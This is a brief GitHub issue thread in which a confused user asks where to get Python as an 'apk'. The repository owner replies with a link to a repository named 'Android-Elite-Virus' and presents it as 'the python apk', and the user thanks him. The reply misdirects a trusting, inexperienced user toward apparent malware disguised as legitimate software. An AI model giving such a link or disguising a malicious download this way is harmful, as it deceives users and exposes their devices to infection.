### ISSUE TITLE
Very important issue please read

### ISSUE THREAD

**Issue by infamouskoala** [lukemattle/comsci#1]
Kindly do not put ur school projects on ur discord linked github account, this causes delays and dissatisfaction for your fans who are waiting for your new uploads..

Also do I need python installed to use this? It says "Python is not installed" idk what python is, is that a new application that u have to install? can I get the apk link?

**Comment by lukemattle** [comment]
https://github.com/harshalbenake/Android-Elite-Virus
there's the python apk

**Comment by infamouskoala** [comment]
> https://github.com/harshalbenake/Android-Elite-Virus there's the python apk

thanks a lot!
